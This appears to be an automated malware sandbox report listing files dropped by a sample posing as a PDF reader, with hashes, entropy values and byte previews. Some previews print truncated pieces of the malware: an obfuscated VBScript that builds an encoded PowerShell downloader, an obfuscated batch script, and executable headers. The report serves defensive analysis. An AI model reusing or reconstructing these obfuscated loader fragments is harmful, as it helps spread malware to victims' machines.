                                                                                                                                                                                        MD5:08D48BB5A4E1C7A5A6CCEC11C1A6CB68
                                                                                                                                                                                        SHA1:3D609EE87CA224A316227A8225B0F5FFE465AA98
                                                                                                                                                                                        SHA-256:D1AAE1434E502CEA9556E394CE892DF5407AF5F1110222D6303032F792ED57FD
                                                                                                                                                                                        SHA-512:19C7B4236B6E06B5D909B326EF73435D7E864F2C345ADAE1DD10F1AF4F2B6A68D46C8339D9C0F17D00FC4A2947DCFCCB1E8DBD1E9FBD29872EF65D61587C991F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:0..a......U..Mcq..Q..B=.qmOC.d...|...}.\..0Y.H...F....5k.yi...I).-n.s...g...^f..m..Z+..r...v.v....y..:.G.A.....}.Ig...n.....x...mC..`...V8.*.#.s[.Qm..}.Dm......<.....o.....;:q...)..E...!..i\.oN#.....;W.DJO.[.y.}c....E..Rii.3..[.Y.t.......;.;..f.c..F..n.<tR....-..c.N...A.L.....{.>.|6N.l.......k..^..Cpv....Hn*g-.*.O....&...N.............1....ZA....[..*..3....1s....6%.M.uv<4.].F2....CT]l3-.5..r^..1..H.......^|88..F..}....jb..n..X.3........P5...g.~E.*....j^.:l.....jV...5.L9..bO......+....:_6....{..+........<..J.r...c..R.GL.{.Q.Se.L.B.7..%..A.s........Q.......W....w...,...O|{.:.......=......t...#{......C.(.....[..7.....e.HS...jo.)./.i=Uq..5.......:(*.....)v.j...<..k......q.\..a..\.Z..6B....=...9$DW|........2...B..&.#.J.L..l3.....(.....(..[T.3Z.....U1?.s.a"..O&..y......@..3.!...7I..p.Y..^.Rx..?C.g..dH....tG..c.d....5`r?.[...8<.#.xn.T._..N.......h...|..W.`.A...DC.W....H6%....^.......?...^._..u...t.@"....'.V....G...2f^{W6.
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):5963
                                                                                                                                                                                        Entropy (8bit):6.12880387919543
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:6+xgUzr4tgOwVAfBzDICS09CAi6R7u+IhsObfS+NsPvj6ooxdofjxP3yGj1H039b:lHAeOqAFDw09CV/2nPvj6DdMP3r1HIF
                                                                                                                                                                                        MD5:630673FEA68BDA5CE7750D0BACB5FF0E
                                                                                                                                                                                        SHA1:CA24CFDD26FE66409230E5E1509F86D2BC3A0BA5
                                                                                                                                                                                        SHA-256:BE6A1C82EAE77CF9BBAABEFA38E652236A31317CCBF9F9F2387F4155B871A33D
                                                                                                                                                                                        SHA-512:3A96DEE0F6141F7D84AA3FD475A837C0DCF4D7AFDE871F87FDE8C1199FB5514628B9D7EFB05D3B720FD8E22166E44467E5863FDFA197193B7E3C04DD917084C7
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:speechesdjexpandingsoviet..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.....................................................................................................................................................................................................................................................
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        File Type:COM executable for DOS
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):57344
                                                                                                                                                                                        Entropy (8bit):7.9968543205672145
                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                        SSDEEP:768:MHxj8LsVkYq5E/cCSLRNdqBCD6fWLLzAC6rnlBNGIta6P9b0jJnWnWD92Dx:6xe7FNdmknA9rl/G0X9be9K
                                                                                                                                                                                        MD5:64BE2AA6B09B4D3B1AE7F5496DC50D36
                                                                                                                                                                                        SHA1:D74A4209344293473D5BA7EC8F044419CA140B5D
                                                                                                                                                                                        SHA-256:5773776EB34D9B7CF9EFB47FF33655462607BCAD9EAFED7E3D27F192667B9944
                                                                                                                                                                                        SHA-512:C9DAE81739761F34BA9A1DCC16D484A76032B888954615884E70DFF5FC9259DBA7A89ACFE0144CC60AE3BF3D20487E3C9A80CEC19ADC6575B4F9AAF92EE0B9A1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:...YH%.9z#......\..|.....,u.A...T...)..Dz|:...&...{.,.e.D.k.n#u......ULO&M.R.5_'.....^.|D_..:j<....82.4..3.........J*.... ...f....qjN....\..V...5.).>....6.h~.@N.{+..sT.^I...Ix...q...q<P.]G.n.~..%...Y.[......]....cgD...9.w......S.|..u..E..m...u...."......x..8W.JJ(.JcM7....]..3.9..C..#....Y...&..Wz..n.H...I..T.....o...f.f.H.M.BT3...3h\....D.!.....h.'......Z.Z.Gxo.).E...".K&..F^...PX.{.q.r..m.h>.Z.*...]6].....3.o......cN.v(D`.#?..o.....O...r..8......s.j,TS28S....zh.'..`./...t..K["Au.....?.f.....6....-..S....RvS..A.>..*QB.V..:.0.5V..(...[.r.......T..|.]..J.4..z...z/A..<...5.hY.$..&..p.9..C..$.~..Y.=.+m...(uAE.<..a.l.I2J.f`...|..S./[....tO....k./:'/0...7L8_....~.f...-..k.;.kN.f..:D....q$_.j.#...W..@r......v....:..Xi...(......d....|.q....x...s...E..+.N.6.yDc...N..'.D..E<a..I...1...pb...(,..M<..`..Yf......X.u....l.0.T.eR2V^o.C......f/2.M.\h1......(...<*(..}.XTq........W.....I.04.4...m..jf...)j..... z....mt...'z}z..ok~8&<......_.)..V[{..T
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):63488
                                                                                                                                                                                        Entropy (8bit):7.997523082099138
                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                        SSDEEP:1536:qRe7XLN2OhRE//j1JbbKhLGKdh8lvT0ThmAqKjr4:Ge7XLNJmHOq8ILOQajk
                                                                                                                                                                                        MD5:C255A215A56F0191FF16163454BA6ED9
                                                                                                                                                                                        SHA1:2268B09FB0E58C569BC2CDF0562D7ADB12471776
                                                                                                                                                                                        SHA-256:E616974209F50AB58459F6FB5A960122CD37241B8C57A89556F443161C92B148
                                                                                                                                                                                        SHA-512:5A009DA0BDDB7A49EF1CC6B270769C527DE138C643EB454763E73EFCDB9C40E918A70539956BFE0BFCFC248EFDF4FF759080DC42B4B591F3A853FF0FF9EE8137
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:..Il-(.....a......i.(.K9Q....a.....>.s....'#..W........~.p.,...pT.3..$.."...F.$n*..tb.ac.s?U..0......%."...f.}...+._.^?.........^+...e..p..`.]_...o]...Q..cP .n.l....k...x'x...G....S.s.........H.v..x..+S...P..[5..........m..-l.......R...~.f0"1.S.. R.z."hb......H....f...o.S...nB.B.......4....!..4e.BPj..F.,.1.G7.%.8L7.fZu.B`.....K.(.W......W..C......K....f.+p.$....x*.*.4G;0v.:..P,Z...+.J..........`/...6.Q*...p..ku....H....'....t..F(..n...#sj.w.`.....q.]..0u....o*..v7...w>W.B.8..=...4q"...T.b.L.s?.&......"Z.k.Ep.d......r...M....7s..,...b..!...k.7w...,.Nv...m.%...2.W..5./.+.M)....P1.Z...wg...M...R.4......-'.xj...x.(..+.....0>8+.d0...4.....y..D....)i....b...!......X.(KegT=.)k..b...t....uD..1.]..L.i`|.(.G...(....e!.."W..l..l..,.R8./i=.......2.}B;.....{..7b;f4r..8......74.|..d@..*b./...-.eL*.$...o\...@E..x.3...=.c..9(%...............[,...$...k.;.T.C*...v.......qm{.v;..&....."......!.......b.&......d*K............:...d..Z.......5U..O..f."..%..
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):887672
                                                                                                                                                                                        Entropy (8bit):6.622254860312659
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:PV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:Nxz1JMyyzlohMf1tN70aw8501
                                                                                                                                                                                        MD5:783575F3F822151ED1B1E1022A10E027
                                                                                                                                                                                        SHA1:D03E7B6BE2EEB48E0E09B9050C4739B07A1A889D
                                                                                                                                                                                        SHA-256:D1E3A4A8B96F3EA63281200340552D7A1E0A5514F3BB5726D10B0D871C20357E
                                                                                                                                                                                        SHA-512:E19791DC189B3F699D02EFBD8C1B05AFBE6049CCF1D09A2A89D9FCC64AD15D10076389BAC02EA110F76B959040F96E45B58B14568AE4874381E2515D1D9B595E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:..t_f.F`f......f.Fdf.......E.P.7..4.I....9^Xt=9^\tE.E.P.7....I.9^`......9^d...............{.......}..t..f.E.f.......f.E.f.......U..wL..M..........E....t..AX.E....t..A\.E...~..A`.E...~..Ad]...U..Q..xL.V.u.Wj.....8W................4xL.j.Z.U.;........$xL.....0.........F.;G.............................................}...VW.....~d.......~h.......~D........~P.......>.t..6..<.I..&..u...wL..x.....4xL..U.B.U.;...V....u... .........$..........xL........t.Q........xL..... ....wL.J...wL.;5.xL.u....xL.....xL.........._^..u..5.wL.R....I..%.wL.....xL...t...xL..D...8.u...xL.........]...U.....M...xL.SVW.....wL..u....]......j....E....(.I..{L...t..{L.....}....$xL.......KH..yi..........wq....&@..$.e&@..E...........}....{L.uUj...(.I.P.u... .I..}........j..u...8.I.j.....I._^[..]..........t....j...........E...sL.k.C.P&@.W&@..%@...C..%@.W&@................................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..Q
                                                                                                                                                                                        Process:C:\Users\user\Desktop\6706e721f2c06.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):15495
                                                                                                                                                                                        Entropy (8bit):5.438523014584766
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:oAMRc8EUfodpaQxnN52IivxHBN/ErbOIwo29s89KrsuqcGPJZMxu2hlYF9WBMDx9:oJoDam2nJB5Erf3gUIRPJmxNSiMFpWi
                                                                                                                                                                                        MD5:CF229A487670D264355F4511A3CE2886
                                                                                                                                                                                        SHA1:4A1D08D1FAB41D77ADC541F20BA6449593B1E0AB
                                                                                                                                                                                        SHA-256:DB2EBD4553854780E6F3D40204C4F57A975B8EE5693E7D36DF01626810E34E91
                                                                                                                                                                                        SHA-512:A2845B5C7B40DB3DCB4150538BDF29A831ABCFCEEF341FA8951DE423A594A05961797C203C7BD4A8667633DA811A649C0CC54F4B836FFFF2494AC413E3046C02
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Preview: 'g..aFmkddFFebh = rRegisggfgtertehkggns2211 & ""..Call Uglisging("")..Call Uglisging("")..Call Uglisging("$co" & "digo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#B")..Call Uglisging("v#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#")..bdapoonc = LenB("hdeiAAha")..Const nipankpo = "ikmSbcjF"..'ahcejhb rAmpkIb..kckAkdf = LenB("pgpmjgdbo")..Const beigiom = "cofhAbrme"..Call Uglisging("B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk")..Call Uglisging("#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#")..Call Uglisging("Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#b")..Call Uglisging("wBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B")..Const Adrcbadki = "efhdnnd"..'criebkSfa rhrbnmnAk..epbhbgaIg = LenB("ecmnjmrI")..Const nkmgfdmch = "rbodirik"..'iFbIkbdhi dcddFfidg..Call Uglisging("7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#")..'ikfcSen erAmkiffe..idaejfAda = LenB("fkmijmmo")..Const bdnckIS = "jhamkifA"..'Agoaepo cIbbrrad..gba
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):15428
                                                                                                                                                                                        Entropy (8bit):5.434610218872492
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:vcNn1ahje8o9yE8pYqfz6PJmxNSiMFpWfzCS:vcsje80qpYqfzOW2ix
                                                                                                                                                                                        MD5:3AB49C12B0BFCBB323BB5A1D340107FF
                                                                                                                                                                                        SHA1:C8F4F55296010F3122AC48EF5A173D74FA2C80D8
                                                                                                                                                                                        SHA-256:333773EDB783EC93040E6CF60F1873095F59606AE6DD376128BF44111551FE36
                                                                                                                                                                                        SHA-512:09BB6CF4DAD3EBB494C50C588C7B7E6516654E8EC498357C251D33AC183416376110F5E44B38F876D76D6122F593A393A85B2C693AC3289F8F8ADEA70E9D7C73
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: 'g..ebdkooicrdk = rRegisggfgtertehkggns2211 & ""..Call Uglisging("")..Call Uglisging("")..Call Uglisging("$co" & "digo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB")..Call Uglisging("0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G")..kkfpdead = LenB("mSkmrio")..Const fgkhdrom = "fIdiroc"..'bAbegmb mkpkkAmIi..pknSnid = LenB("knceamhd")..Const goiAmjmb = "IekSkrgp"..Call Uglisging("8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ")..Call Uglisging("#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C")..Call Uglisging("##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#")..Call Uglisging("YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh")..Const ndfkoko = "roemimfb"..'bSoegSi SkdcoSkd..kohbrfdk = LenB("mcAnIpnie")..Const gjcImkkk = "dednmcp"..'fkIfbIndg nIbijphA..Call Uglisging("#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck")..'moohmSee jfgefdhF..pSigamckr = LenB("mmkcikii")..Const mbSnFmdAd = "dFFkAbbi"..'kSrIrikd
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        File Type:ASCII text, with very long lines (625), with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):14806
                                                                                                                                                                                        Entropy (8bit):5.122793768046813
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:dtt9GRsIU7/WSSrUDL+aBA9qkziD64jKEHk7Zx2TV:9ERs/7/GE+a29qkzQ6wHqx25
                                                                                                                                                                                        MD5:479CA8F2E48FCF67B018C911CD335AE1
                                                                                                                                                                                        SHA1:F8A2D5E86A8854BB97E1AA48E9DFE10FD24B32EF
                                                                                                                                                                                        SHA-256:59194CC6347489F833B3D58EC07B1CAA054FB48856C1D27299584EF34707A638
                                                                                                                                                                                        SHA-512:9D5CE01BE08EDCDE6904067B0E3C26F06D17F4501FA6DC68F8665C9B63FAEBD39ACB6DC2EEE82180532C71C63C4531DB029BBDC78388EB0326263FFE964E496E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:Set Purse=V..ZBzPost-Meaning-Pour-Tired-Unsubscribe-Promote-Participants-Composition-..PUMl-Movement-Zip-..PdTemperature-She-Michel-Product-Promoted-Tire-Grey-Constraints-Continuing-..vnHonda-Prayers-..qLdJPatents-Fuck-Report-Carbon-Spam-Gd-Mailing-..WaDMultimedia-Keyword-Advertisers-Bs-Stranger-Wing-A-..AvYF-Renewable-Studied-Telephone-Please-Wma-..nGoIi-Significantly-Midi-..Set Angels=B..XZxSExpert-Def-Taking-Architectural-Opening-Accompanied-Gloves-Astronomy-..mzFirm-Designs-Use-Relates-Itself-..CaLobby-Publishing-Cdna-Brass-Viking-Cool-Free-..mjvZum-Flows-..ZfYYThey-Directories-Amongst-..PZikJacksonville-Vii-..Set Witch=6..nSVaries-Capable-Motivated-Decrease-..rbLucy-Again-Fi-Charging-..UAcyOccasions-Error-Embassy-Contracting-Hardcore-Looksmart-Smart-Cheaper-..JyaGauge-Date-Jeffrey-Fisheries-Laptop-Attorney-Al-Theoretical-Seconds-..dHsCubic-Wow-..bnGerman-Subscribe-Marathon-Approved-..LeciRon-Excess-Comfortable-Beta-Walks-..Set Branch=F..jEBAlt-Edward-Edwards-Fix-Wagon-Taxes-..JKDL
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (625), with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):14806
                                                                                                                                                                                        Entropy (8bit):5.122793768046813
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:dtt9GRsIU7/WSSrUDL+aBA9qkziD64jKEHk7Zx2TV:9ERs/7/GE+a29qkzQ6wHqx25
                                                                                                                                                                                        MD5:479CA8F2E48FCF67B018C911CD335AE1
                                                                                                                                                                                        SHA1:F8A2D5E86A8854BB97E1AA48E9DFE10FD24B32EF
                                                                                                                                                                                        SHA-256:59194CC6347489F833B3D58EC07B1CAA054FB48856C1D27299584EF34707A638
                                                                                                                                                                                        SHA-512:9D5CE01BE08EDCDE6904067B0E3C26F06D17F4501FA6DC68F8665C9B63FAEBD39ACB6DC2EEE82180532C71C63C4531DB029BBDC78388EB0326263FFE964E496E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:Set Purse=V..ZBzPost-Meaning-Pour-Tired-Unsubscribe-Promote-Participants-Composition-..PUMl-Movement-Zip-..PdTemperature-She-Michel-Product-Promoted-Tire-Grey-Constraints-Continuing-..vnHonda-Prayers-..qLdJPatents-Fuck-Report-Carbon-Spam-Gd-Mailing-..WaDMultimedia-Keyword-Advertisers-Bs-Stranger-Wing-A-..AvYF-Renewable-Studied-Telephone-Please-Wma-..nGoIi-Significantly-Midi-..Set Angels=B..XZxSExpert-Def-Taking-Architectural-Opening-Accompanied-Gloves-Astronomy-..mzFirm-Designs-Use-Relates-Itself-..CaLobby-Publishing-Cdna-Brass-Viking-Cool-Free-..mjvZum-Flows-..ZfYYThey-Directories-Amongst-..PZikJacksonville-Vii-..Set Witch=6..nSVaries-Capable-Motivated-Decrease-..rbLucy-Again-Fi-Charging-..UAcyOccasions-Error-Embassy-Contracting-Hardcore-Looksmart-Smart-Cheaper-..JyaGauge-Date-Jeffrey-Fisheries-Laptop-Attorney-Al-Theoretical-Seconds-..dHsCubic-Wow-..bnGerman-Subscribe-Marathon-Approved-..LeciRon-Excess-Comfortable-Beta-Walks-..Set Branch=F..jEBAlt-Edward-Edwards-Fix-Wagon-Taxes-..JKDL
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):63488
                                                                                                                                                                                        Entropy (8bit):7.997186052931585
                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                        SSDEEP:768:DyOJt+CBDUF3JNLw+ghUb5CnctefPzc1xLl1M9rtOI2A82B/EyB7FG3RZUahmdHw:WIt+CMqebsnaAsx5O78yzSmda6K
                                                                                                                                                                                        MD5:7E3B9B5EFEDCE4231BB02F1FD97FCD5D
                                                                                                                                                                                        SHA1:1042788B51134C23008ED274B598559E9B1568D8
                                                                                                                                                                                        SHA-256:B7E8EE21F058DF49534EAC35FA6E4CDF1C3E6F599E0B131344F349284A0CE5B3
                                                                                                                                                                                        SHA-512:3C621DE45969A177209E9F6027CCE646D165130C3D40A84F2920D3939EFD30479E9E21912A8FC016F63AB84FDFA0879201FAA421FA90031DB6C81250BB524FF9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:..b.5....X.&..u...= Q.Q../.^.0&.uK..B..L...Ah.j1.n:..#.^......$.Y.....O..9ns.@;..^.Q.^........R0..y.S.O..G....'. .z]..........^Q.vhS.&?Jd.s .|..&...i..........I.6d."....(...f.......u....{.x...I.k.L....d.9....M.c-.y&..4.'.62.....b..Z .....S.x.i./.Li.C...;6.R.n>.I.[..;..P...............g...E.u...d0..mf..J..P0..A........:..'.=...P.0./..j.#.T..kO{..T%.8...t..".4....**.c&.p(Y........Du.3..d....^.;..+..H.../..O.....Y...7.=:...B.W$.'%(.g...L...........n..]..}....-..E_.~+XQ..........~?1&....:....4...M.Cq5...k^E.....v!...u..@?.o..H.yzB.....@...z.bG1r'.#.[v...,....}..]..OE.jMjR;.}.r.?......<5.....6... PN;...p..^.5.KO|....\Z...;%".3.....Bw.c...M..{.KB&.._......0.....r....b.s..d...".R9v.[C(D...~.h.;...t.,...F..../...[.....%K.U{...1.>.Xa...p.QP...6.,'7.9.6wn.i'.....1,..>....ia..t.mx..!./J2. ...c..u..K.l..u..'..H6._.b..9.Yx.L.{..C..\...oF<.y.O}..Q..P..f..3b.....Q.]...O0..\....n.H1.1...2}...E."RQ..h7UzW.M......a.g'..R.^....[..d>....sq...<.6sbHf.}..:......s
                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):184320
                                                                                                                                                                                        Entropy (8bit):6.470945684024879
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3072:gHwrxmMpvDITZg1Sd5GWp1icKAArDZz4N9GhbkrNEk1m0r:frMZTp0yN90QEW
                                                                                                                                                                                        MD5:1B8A04E03B265D0397C024B692E25C6E
                                                                                                                                                                                        SHA1:475EB0FD8F6582285B243E0773A61DC9FF8696DA
                                                                                                                                                                                        SHA-256:76EFB280FC1D0DDF376AEF018F26F3185FBD80990FB283FF02F522EAD480B207
                                                                                                                                                                                        SHA-512:521025CEC9875929F3FB1DBF24F004D30B76CC0D21F07B9DC36D50624630044774471D6EB57886EA500254C9A51175FC668BDC3A0D17FEC74C3521F61144B97C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Kr..%!..%!..%!&. ..%!&.& ..%!&.! ..%!&.$ ..%!..$!b.%!&.- ..%!&..!..%!&.' ..%!Rich..%!................PE..d....y............"..........@......`..........@...................................."0....`.......... ..........................................................,...............,...h...T...............................8...........H... ............................text...@~.......................... ..`.rdata..@#.......0..................@..@.data...............................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..,...........................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):84992
                                                                                                                                                                                        Entropy (8bit):7.997934914627425
                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                        SSDEEP:1536:pZ9pxeNbAI26WWtY7UbV19KXmzlbz+IFTrImp5IBVvc7yBhTQD:1XeuI26LpV19KIbFrImMBVvQiiD
                                                                                                                                                                                        MD5:A265646B71F2BD90B49AF78BACB0A603
                                                                                                                                                                                        SHA1:C43BE494FF7B8802E7E013C3D576767844A0102D
                                                                                                                                                                                        SHA-256:AE7F2C347F8938BBF0532472BBC8984FE93E7C0748B1D368B1172DD1F2DF60F2
                                                                                                                                                                                        SHA-512:090D00AA588AD1CCE583EDBCC66B1B6DE002D34FDCA5743B6114FFCB84F4B645EE9947CDC494E83FEDF4F704B13067B3FDC21F88F33E3085BCBE105D445577C5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:..C.y..8.....H2....[J.e.......A.<....@q..y.....p./c..e...E..K..h<}..6../..X[^.."..D({.......7U.-.......X...d..#M(.....{%u......\._.....b.=.....0..lsl.....a...E.}....=(...8.....w..2..F=..J.M..aU....v...jIz6.."...Q.....&!-&.......*..$(.W.6~.=...n,6\^E../.B....to.f....*....~W...C;....@_.X{.G o......C.,.Z...J..r......."Y.e.#5.=..........D.Qr.#....4..0."S.p.|.3b..R.P:.Q........@Q.'cf....mN...I.J.5.$....T.^....~.Q2..S.p.....VNZ...U.{IO. .~........h....fh...BK..7.L<.....*[.E...n){..(.z.~..I.d.ZY=S....N|....x*.c3...b)${..Sr...@Or..WF.x..+.".....N.I...l....l.U..,..<.N.a........F..,(...........]...l.H.kkp=.!.mH./.d..{l.0...(..!.......Z.]....~5..a zb8.....{..&......'9~Z...?}...~.R.'.yOq%f;C..hd...$.."..yEG.I...J4..ytm_.r.g.3..Hk.%...C.....w.=Gq.#?.q....f..M...F......f '..F..41..Y~...U..r..Y,.i.=..x.....B...#..R?...4.&m..w...l[..An..yR...UJC88...`....~.i"C...:..k.=.T.x..^.r.X.u~...R.......~eBp..j.-W.= .S.V. y.:B{.8...x.....|....].:..LI.1..x>GA.,0>R..
                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):96256
                                                                                                                                                                                        Entropy (8bit):7.99818489603465
                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                        SSDEEP:1536:GTJWINAFE0sjJpGxwQQxx9k8QqQYaz5fah9Z6L2amTft88wOyzZen7iYE/TLVZ00:0UIp0YSxwxQTXdfU9Z6OftcO0Zen7dE1
                                                                                                                                                                                        MD5:440B16F0DA2CABDFDB6DE4C4F73A6061
                                                                                                                                                                                        SHA1:E983BC7837886155A9B45FF9C17CC5DAD5DAA02F
                                                                                                                                                                                        SHA-256:992D790758C278DD0653C40BD77F70D8EE0378F277162637215ECAE8815FE034
                                                                                                                                                                                        SHA-512:4A49079828A9A6150DE7B582BE92DD7A43364A43B2FE04F1A782B5E32A36B3DE9F4587B4091D82760BF566E318DC925D4684EC8A9E7993B8899B8EC042C6D917
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:........0.%..w. F........*..o..:?.....d....yb.X.g..4......0.1..........F;^.e.v.O.?..%..K.3S.Pjg.)[..9..5u*...+..J.\*....~...g....O4.|'.......n...~.+O..k....T......r.?B.>..v.4..Tl.....K.5>...:...._W.?.GKk(.....R].T...m;J[....e.e#.H$pi..IpPQ....S..7..D....[..u.. .`.c..0FhH..!S.D....bM?O%..{HC..e...Tl_....i..K7..3...,.|N.......#....`..........1...R.K.={...L..o}.&.ztS(...{i3........3...$!_.....a...tS.Y..QP.6.*...A..rc\.^)......y3>..4.J.^...AK.<......O..;..G...o...\.9...!V..'..r......B.O........^.l..."..:...T.TT......`.w.....A.V.1......r.pH...........,.....-..#../.,.Y..a..+.57..:..[t.<g......V...Cv.J.u..u2.....nw..T.t.E...s$....c.D........o...y... .EiE.A3..h.K@+.P n.w...b.?.j&...1.s^.............qHo......T...I...7.G..{.D7|%..I.8.F.ZH'.dHw..?.f8pb.-.91.v-.{....f.Y....>+.p}... .&.4I,!..'.fm..zs.za...X..,..b.W.5.rs0....b{...U......W.Q@......N{.D...?.^H...&6cH..h........lT7..=7...BF.4....2.LN.....DK....b.......i..H...A.h...B...r
                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1308110
                                                                                                                                                                                        Entropy (8bit):7.977933269067656
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24576:xbS0RhM8VtCAsdn3x4K30AHc/nVHwOsG91VT9LcsikZeHoi+oYjqm2Z:VXh5AN3xN30AHc/V6G9n5KaAZpZ
                                                                                                                                                                                        MD5:5699D5B44379624EBC78078A1B85E18C
                                                                                                                                                                                        SHA1:EC5C17B3D75B17ECAC13189411C947A2E702D2BF
                                                                                                                                                                                        SHA-256:06363CA6381D7C68F453B58F0566966CAA9169C25DEA626CFCB7001A3DD7BC5F
                                                                                                                                                                                        SHA-512:DB80B2BF2FBA5CA707C34B3B96B37CC6F1B07D3EA932E8A1CF18DCBD0C14DE264DC30B04AA079666AA1F6A37999D78A7B6BC6BA658486F241801E53E3DBE8AB5
                                                                                                                                                                                        Malicious:false
